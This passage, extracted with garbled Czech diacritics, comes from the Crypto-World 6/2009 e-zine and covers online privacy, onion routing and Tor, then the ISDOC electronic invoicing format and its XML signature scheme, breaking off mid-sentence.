V některyacutech přiacutepadech dokonce můžeme uacutespěšně tvrdit že data o naacutes velice uacutezce ovlivňujiacute naše životy [4] Na zaacutekladě těchto informaciacute mohou instituce rozhodovat o tom zda dostaneme půjčku v bance zda dostaneme viacutezum do zahraničiacute či zda jsme dostatečně důvěryhodniacute pro sděleniacute tajnyacutech informaciacute Nepřiacutejemnyacutem faktem je že sděleniacute těchto dat si nijak neuvědomujeme a nemůžeme je tiacutem nijak ovlivnit stejně tak jako nemůžeme ovlivnit chyby ktereacute se můžou v těchto datech vyskytnout Jednoduše proto že ani neviacuteme kde jsou v současneacute době data uložena Jelikož se jednaacute o cenneacute informace jsou často prostředkem

Crypto-World 62009

8

obchodu např reklamniacutech agentur To je zřetelneacute při využiacutevaacuteniacute služeb jako je veřejnyacute email internetoveacute obchody vyhledaacutevaciacute naacutestroje či komunikačniacute naacutestroje (Facebook atd) kde je reklama zcela ciacutelenaacute podle toho jak danou službu využiacutevaacuteme Tato reklama je pak takeacute mnohem uacutečinnějšiacute tiacutem paacutedem jsou jejiacute zadavateleacute ochotni platit značneacute sumy za data o uživateliacutech

Jak bylo uvedeno u přiacutekladů z předchoziacuteho textu existuje při použiacutevaacuteniacute informačniacutech technologiiacute přiacuteliš hrozeb na to aby zůstala naše identita skryta Tato digitaacutelniacute identita je pak využiacutevaacutena při aktivitaacutech ktereacute již nemusiacute byacutet zcela v zaacutejmu uživatele Probleacutem je že v teacuteto faacutezi je teacuteměř nemožneacute takoveacuteto užiacutevaacuteniacute dat omezit či kontrolovat Důvodem neniacute až tak technologickaacute nemožnost jako neochota poskytovatelů těchto služeb umožňovat anonymnějšiacute prostřediacute V naacutesledujiacuteciacutem textu bude představen naacutestroj kteryacute může řešit prvotniacute probleacutem tyacutekajiacuteciacute se analyacutezy provozu v datovyacutech siacutetiacutech Je zde uveden jelikož se jednaacute o stavebniacute prvek využitelnyacute při uvedeniacute dalšiacutech technik ochrany anonymity uživatele v celosvětoveacute siacuteti a o prvek bez ktereacuteho by pokročilejšiacute techniky ztraacutecely smysl Adresace v IP siacutetiacutech

Prvniacute probleacutem kteryacute potřebujeme vyřešit v souvislosti se zvyacutešeniacutem anonymity v IP siacutetiacutech je adresace a směrovaacuteniacute Všechna posiacutelanaacute data jsou zapouzdřena do IP paketů viz Obr č 1

Obr č 1 Hlavička IP paketu Součaacutestiacute hlavičky těchto paketů je takeacute zdrojovaacute adresa a ciacutelovaacute adresa tedy jednoznačneacute identifikaacutetory původce komunikace a ciacutele komunikace V předchoziacute kapitole však byly popsaacuteny hrozby plynouciacute z možnosti identifikace komunikace Vidiacuteme že tedy již v naacutevrhu komunikačniacuteho protokolu TCPIP je jistyacute probleacutem braacuteniacuteciacute zvyacutešeniacute anonymity v globaacutelniacute siacuteti Existujiacute však řešeniacute kteraacute jsou již v současneacute době použiacutevaacutena a kteraacute mohou tento probleacutem uacutespěšně vyřešit Ziacuteskaacuteme tak protokol pro anonymniacute komunikaci kde z odchycenyacutech dat nepůjdou zjistit jejiacute uacutečastniacuteci Jedniacutem z těchto řešeniacute je onion routing [6] Onion routing

Ciacutelem metody je anonymniacute provoz v IP siacutetiacutech diacuteky tzv onion routerům Technika využiacutevaacute současnou infrastrukturu je tedy ihned použitelnaacute po nainstalovaacuteniacute přiacuteslušneacuteho software Zaacutekladniacutemi prvky jsou klient (Alice) onion routery a server (Bob) ke ktereacutemu Alice požadavek vysiacutelaacute Z odchycenyacutech dat neniacute možneacute vysledovat ani obsah komunikace ani jejiacute uacutečastniacuteky Každyacute prvek kteryacute se komunikace uacutečastniacute (onion router) znaacute pouze předchoziacute

Crypto-World 62009

9

prvek a naacutesledujiacuteciacute v cestě žaacutednyacute jinyacute Pouze posledniacute onion router v řetězci tzv gateway data rozšifruje vyšle požadavek na server Boba v internetu a obdržiacute odpověď Tato odpověď se zase zašifruje a vraciacute se přes onion routery zpět k původci komunikace Situace je znaacutezorněna pomociacute Obr č 2

Obr č 2 Struktura onion routing

Bezpečnost tohoto řešeniacute a anonymita Alice je založena praacutevě na routerech Ty si předaacutevajiacute data mezi sebou a znajiacute praacutevě jen předchůdce a naacutesledovniacuteka Jelikož je cesta přes routery vždy naacutehodně zvolenaacute a unikaacutetniacute neniacute možneacute zjistit Alici Jedinyacute kdo s niacute přiacutemo komunikuje je prvniacute router nicmeacuteně Alice se chovaacute z jeho pohledu jako běžnyacute router kteryacute provoz takeacute jen přeposiacutelaacute a negeneruje tudiacutež ani prvniacute router neznaacute původce dat Celyacute provoz vyslaacuteniacute požadavku od Alice k Bobovi tedy probiacutehaacute naacutesledovně

1 Všechny prvky v siacuteti vlastniacute soukromyacute a veřejnyacute kliacuteč asymetrickeacute kryptografie 2 V prvniacutem kroku si klient zvoliacute routery přes ktereacute půjde provoz Na jejich počtu zaacutevisiacute

bezpečnost a anonymita ndash čiacutem viacutece tiacutem je menšiacute možnost vysledovaacuteniacute Tato cesta musiacute byacutet naacutehodnaacute Klient znaacute veřejneacute kliacuteče těchto routerů

3 Klient zašifruje svůj požadavek dle naacutesledujiacuteciacuteho postupu )))((( požadavekEhlavEhlavEData

CBA VKVKVK ++=

4 Tedy vezme data pro Boba a zašifruje je pomociacute veřejneacuteho kliacuteče posledniacuteho routeru C (gateway) K vyacutesledku pak připojiacute IP hlavičku s adresou routeru C a znovu zašifruje pomociacute VK předchoziacuteho routeru B Tento proces se opakuje až k prvniacutemu routeru A

5 Tyto data pak odešle routeru A a tvaacuteřiacute se jako běžnyacute router tj že data pouze přeposiacutelaacute Router pomociacute sveacuteho soukromeacuteho kliacuteče rozšifruje kryptogram a zjistiacute hlavičku IP paketu v němž je uložena IP dalšiacuteho routeru a kryptogram zašifrovanyacute veřejnyacutem kliacutečem tohoto routeru Odešle tedy tyto data routeru B Takto postupujeme až k posledniacutemu routeru Jak je vidět žaacutednyacute router se nedozviacute viacutece než IP dalšiacuteho routeru (popř předchoziacuteho kteryacute data zaslal) a zašifrovanaacute data

6 Jakmile doraziacute data k posledniacutemu routeru C mohou byacutet rozšifrovaacutena a ziacuteskaacute se tak požadavek Ten je routerem vyslaacuten do internetu a je ziacuteskaacutena odpověď Odpověď je poslaacutena zpět stejnyacutem kanaacutelem Metoda daacutele přidaacutevaacute dalšiacute bezpečnostniacute techniky napřiacuteklad routery vklaacutedajiacuteciacute naacutehodneacute zpožděniacute do komunikace (aby nebylo možneacute sledovat tok dat dle časovaacuteniacute) či vklaacutedajiacuteciacute nesmyslnaacute data

TOR Vyacuteše zmiacuteněnyacute postup je zaacutekladem onion routingu tedy vytvaacuteřiacute se vrstvy do nichž

jsou vždy šifrovaacuteny informace o dalšiacutem bodě Nejznaacutemějšiacute implementaciacute tohoto postupu je TOR což je projekt The Onion Routing [7] Zde je postup jemně odlišnyacute Vytvořiacute se

Crypto-World 62009

10

symetrickeacute kliacuteče pro každyacute autentizovanyacute router pomociacute Diffie-Hellmanova algoritmu [8] a PKI [9] ktereacute se daacutele využiacutevajiacute k šifrovaacuteniacute zpraacutev (z důvodu rychlosti) Alice pak zpraacutevu zašifruje postupně všemi symetrickyacutemi kliacuteči ve stejneacutem duchu jako v předchoziacutem přiacutepadě viz Obr č 3

Obr č 3 Dopřednyacute směr v TOR

Zpraacuteva je pak doručena bezpečně až Bobovi Ten může vytvořit odpověď a poslat ji zpětnou cestou kde každyacute router zpraacutevu zašifruje svyacutem symetrickyacutem kliacutečem přidaacute tedy dalšiacute vrstvu Až doraziacute zpraacuteva k Alici může byacutet rozšifrovaacutena jelikož Alice všechny symetrickeacute kliacuteče znaacute Situace je znaacutezorněna na Obr č 4

Obr č 4 Odpověď v TOR

Obr č 5 TOR ndash přenos zpraacutev

Crypto-World 62009

11

Vyacutesledkem je praktickaacute implementace kteraacute naacutem dovoliacute komunikovat v IP siacutetiacutech zcela

anonymně i přes nutnost použiacutevaacuteniacute IP adres Zjednodušenyacute proces vytvořeniacute kanaacutelu je takeacute na Obr č 5 Zaacutevěr

Hlavniacutem ciacutelem tohoto člaacutenku bylo uvedeniacute důvodů pro zvyacutešeniacute anonymity v prostřediacute globaacutelniacute siacutetě a uvedeniacute řešeniacute ktereacute může sloužit jako počaacutetečniacute bod Byl zde stručně popsaacuten princip tzv onion routingu a nejpoužiacutevanějšiacute implementace TOR Na zaacutekladě těchto naacutestrojů je již možneacute zajistit anonymniacute komunikaci mezi dvěma prvky využiacutevajiacuteciacute IP siacutetě přičemž data budou mezi prvky vyměněna ale pro všechny uacutečastniacuteky zůstane identita klienta skryta Tyto naacutestroje bude daacutele možneacute využiacutet v dalšiacutech metodaacutech vyššiacute vrstvy napřiacuteklad u protokolů majiacuteciacutech zajistit anonymniacute autentizaci Literatura

[1] SCHNEIER Bruce The Tech Lab Bruce Schneier [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpnewsbbccouk1hitechnology7897892stmgt

[2] FactCheck how many CCTV cameras [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwchannel4comnewsarticlessocietyfactcheck+how+many+cctv+cameras2291167gt

[3] SCHNEIER Bruce CCTV doesnt keep us safe yet the cameras are everywhere [online]

2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwguardiancouktechnology2008jun26politicsukcrimegt

[4] SCHNEIER Bruce Our Data Ourselves [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwwiredcomprintpoliticssecuritycommentarysecuritymatters200805securitymatters_0515gt

[5] Onion routing [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpenwikipediaorgwikiOnion_routinggt

[6] Tor anonymity online [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwtorprojectorggt

[7] DIFFIE Whitfield HELLMAN Martin New Directions in Cryptography [online] 1976 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwcsrutgersedu~tdnguyenclassescs671presentationsArvind-NEWDIRSpdfgt

[8] PKI [online] - [cit 2009-04-26] Dostupnyacute z WWW lthttpcswikipediaorgwikiPKIgt

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je 